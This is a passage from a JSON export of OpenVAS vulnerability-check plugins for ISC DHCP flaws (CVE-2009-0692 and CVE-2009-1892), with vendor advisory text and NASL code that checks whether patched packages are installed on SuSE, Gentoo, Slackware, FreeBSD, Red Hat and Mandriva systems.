dhcp-client\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5053652 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "cvss3": {}, "published": "2009-10-10T00:00:00", "type": "openvas", "title": "SLES9: Security update for dhcp-client", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-0692"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231065322", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065322", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5053652.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Security update for dhcp-client\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n dhcp-client\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5053652 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65322\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2009-0692\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES9: Security update for dhcp-client\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0.1rc13~28.26\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:38:09", "description": "The remote host is missing updates announced in\nadvisory GLSA 200907-12.", "cvss3": {}, "published": "2009-07-29T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200907-12 (dhcp)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-0692"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231064434", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064434", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A buffer overflow in dhclient as included in the ISC DHCP implementation\nallows for the remote execution of arbitrary code with root\nprivileges.\";\ntag_solution = \"All ISC DHCP users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-misc/dhcp-3.1.1-r1'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200907-12\nhttp://bugs.gentoo.org/show_bug.cgi?id=277729\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200907-12.\";\n\n \n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64434\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-0692\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200907-12 (dhcp)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-misc/dhcp\", unaffected: make_list(\"ge 3.1.1-r1\"), vulnerable: make_list(\"lt 3.1.1-r1\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:32", "description": "The remote host is missing an update as announced\nvia advisory SSA:2009-195-01.", "cvss3": {}, "published": "2012-09-11T00:00:00", "type": "openvas", "title": "Slackware Advisory SSA:2009-195-01 dhcp", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-0692"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:136141256231064439", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064439", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2009_195_01.nasl 14202 2019-03-15 09:16:15Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64439\");\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 10:16:15 +0100 (Fri, 15 Mar 2019) $\");\n script_cve_id(\"CVE-2009-0692\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 14202 $\");\n script_name(\"Slackware Advisory SSA:2009-195-01 dhcp\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\", re:\"ssh/login/release=SLK(8\\.1|9\\.0|9\\.1|10\\.0|10\\.1|10\\.2|11\\.0|12\\.0|12\\.1|12\\.2)\");\n\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2009-195-01\");\n\n script_tag(name:\"insight\", value:\"New dhcp packages are available for Slackware 8.1, 9.0, 9.1, 10.0, 10.1, 10.2,\n11.0, 12.0, 12.1, 12.2, and -current to fix a security issue with dhclient.\n\nNote that dhclient is not the default DHCP client in Slackware's networking\nscripts, dhcpcd is. However, if you use dhclient on a network where someone\ncould deploy a hostile DHCP server, you should upgrade to the new package.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to the new package(s).\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update as announced\nvia advisory SSA:2009-195-01.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-slack.inc\");\n\nreport = \"\";\nres = \"\";\n\nif((res = isslkpkgvuln(pkg:\"dhcp\", ver:\"3.1.2p1-i386-1_slack8.1\", rls:\"SLK8.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"dhcp\", ver:\"3.1.2p1-i386-1_slack9.0\", rls:\"SLK9.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"dhcp\", ver:\"3.1.2p1-i486-1_slack9.1\", rls:\"SLK9.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"dhcp\", ver:\"3.1.2p1-i486-1_slack10.0\", rls:\"SLK10.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"dhcp\", ver:\"3.1.2p1-i486-1_slack10.1\", rls:\"SLK10.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"dhcp\", ver:\"3.1.2p1-i486-1_slack10.2\", rls:\"SLK10.2\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"dhcp\", ver:\"3.1.2p1-i486-1_slack11.0\", rls:\"SLK11.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"dhcp\", ver:\"3.1.2p1-i486-1_slack12.0\", rls:\"SLK12.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"dhcp\", ver:\"3.1.2p1-i486-1_slack12.1\", rls:\"SLK12.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"dhcp\", ver:\"3.1.2p1-i486-1_slack12.2\", rls:\"SLK12.2\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-04-06T11:38:39", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "cvss3": {}, "published": "2009-07-29T00:00:00", "type": "openvas", "title": "FreeBSD Ports: isc-dhcp31-client", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-0692"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231064447", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064447", "sourceData": "#\n#VID c444c8b7-7169-11de-9ab7-000c29a67389\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID c444c8b7-7169-11de-9ab7-000c29a67389\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n isc-dhcp31-client\n isc-dhcp30-client\n\nCVE-2009-0692\nStack-based buffer overflow in the script_write_params method in\nclient/dhclient.c in ISC DHCP dhclient 4.1 before 4.1.0p1, 4.0 before\n4.0.1p1, 3.1 before 3.1.2p1, 3.0, and 2.0 allows remote DHCP servers\nto execute arbitrary code via a crafted subnet-mask option.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttps://www.isc.org/node/468\nhttp://secunia.com/advisories/35785\nhttp://www.kb.cert.org/vuls/id/410676\nhttp://www.vuxml.org/freebsd/c444c8b7-7169-11de-9ab7-000c29a67389.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64447\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-0692\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"FreeBSD Ports: isc-dhcp31-client\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"isc-dhcp31-client\");\nif(!isnull(bver) && revcomp(a:bver, b:\"3.1.1\")<=0) {\n txt += 'Package isc-dhcp31-client version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"isc-dhcp30-client\");\nif(!isnull(bver) && revcomp(a:bver, b:\"3.0.7\")<=0) {\n txt += 'Package isc-dhcp30-client version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:40:19", "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:1136.\n\nThe Dynamic Host Configuration Protocol (DHCP) is a protocol that allows\nindividual devices on an IP network to get their own network configuration\ninformation, including an IP address, a subnet mask, and a broadcast\naddress.\n\nThe Mandriva Linux Engineering Team discovered a stack-based buffer\noverflow flaw in the ISC DHCP client. If the DHCP client were to receive a\nmalicious DHCP response, it could crash or execute arbitrary code with the\npermissions of the client (root). (CVE-2009-0692)\n\nUsers of DHCP should upgrade to these updated packages, which contain a\nbackported patch to correct this issue.", "cvss3": {}, "published": "2009-07-29T00:00:00", "type": "openvas", "title": "RedHat Security Advisory RHSA-2009:1136", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-0692"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231064386", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064386", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_1136.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:1136 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:1136.\n\nThe Dynamic Host Configuration Protocol (DHCP) is a protocol that allows\nindividual devices on an IP network to get their own network configuration\ninformation, including an IP address, a subnet mask, and a broadcast\naddress.\n\nThe Mandriva Linux Engineering Team discovered a stack-based buffer\noverflow flaw in the ISC DHCP client. If the DHCP client were to receive a\nmalicious DHCP response, it could crash or execute arbitrary code with the\npermissions of the client (root). (CVE-2009-0692)\n\nUsers of DHCP should upgrade to these updated packages, which contain a\nbackported patch to correct this issue.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64386\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-0692\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Security Advisory RHSA-2009:1136\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-1136.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#critical\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"dhclient\", rpm:\"dhclient~3.0.1~65.el4_8.1\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp\", rpm:\"dhcp~3.0.1~65.el4_8.1\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-debuginfo\", rpm:\"dhcp-debuginfo~3.0.1~65.el4_8.1\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.1~65.el4_8.1\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhclient\", rpm:\"dhclient~3.0.1~62.el4_7.1\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp\", rpm:\"dhcp~3.0.1~62.el4_7.1\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-debuginfo\", rpm:\"dhcp-debuginfo~3.0.1~62.el4_7.1\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.1~62.el4_7.1\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:56:45", "description": "The remote host is missing an update to dhcp\nannounced via advisory MDVSA-2009:172.", "cvss3": {}, "published": "2009-08-17T00:00:00", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:172 (dhcp)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1892"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:64515", "href": "http://plugins.openvas.org/nasl.php?oid=64515", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_172.nasl 6587 2017-07-07 06:35:35Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:172 (dhcp)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been found and corrected in ISC DHCP:\n\nISC DHCP Server is vulnerable to a denial of service, caused by the\nimproper handling of DHCP requests. If the host definitions are mixed\nusing dhcp-client-identifier and hardware ethernet, a remote attacker\ncould send specially-crafted DHCP requests to cause the server to\nstop responding (CVE-2009-1892).\n\nThis update provides fixes for this vulnerability.\n\nAffected: Enterprise Server 5.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:172\nhttp://xforce.iss.net/xforce/xfdb/51717\";\ntag_summary = \"The remote host is missing an update to dhcp\nannounced via advisory MDVSA-2009:172.\";\n\n \n\nif(description)\n{\n script_id(64515);\n script_version(\"$Revision: 6587 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 08:35:35 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-08-17 16:54:45 +0200 (Mon, 17 Aug 2009)\");\n script_cve_id(\"CVE-2009-1892\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:172 (dhcp)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0.7~1.4mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-common\", rpm:\"dhcp-common~3.0.7~1.4mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.7~1.4mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-doc\", rpm:\"dhcp-doc~3.0.7~1.4mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.0.7~1.4mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.0.7~1.4mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:56:52", "description": "The remote host is missing an update to dhcp\nannounced via advisory MDVSA-2009:154.", "cvss3": {}, "published": "2009-07-29T00:00:00", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:154 (dhcp)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1892"], "modified": "2017-07-06T00:00:00", "id": "OPENVAS:64458", "href": "http://plugins.openvas.org/nasl.php?oid=64458", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_154.nasl 6573 2017-07-06 13:10:50Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:154 (dhcp)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been found and corrected in ISC DHCP:\n\nISC DHCP Server is vulnerable to a denial of service, caused by the\nimproper handling of DHCP requests. If the host definitions are mixed\nusing dhcp-client-identifier and hardware ethernet, a remote attacker\ncould send specially-crafted DHCP requests to cause the server to\nstop responding (CVE-2009-1892).\n\nThis update provides fixes for this vulnerability.\n\nAffected: 2008.1, 2009.0, 2009.1, Corporate 3.0, Corporate 4.0,\n Multi Network Firewall 2.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:154\nhttp://xforce.iss.net/xforce/xfdb/51717\";\ntag_summary = \"The remote host is missing an update to dhcp\nannounced via advisory MDVSA-2009:154.\";\n\n \n\nif(description)\n{\n script_id(64458);\n script_version(\"$Revision: 6573 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:10:50 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", 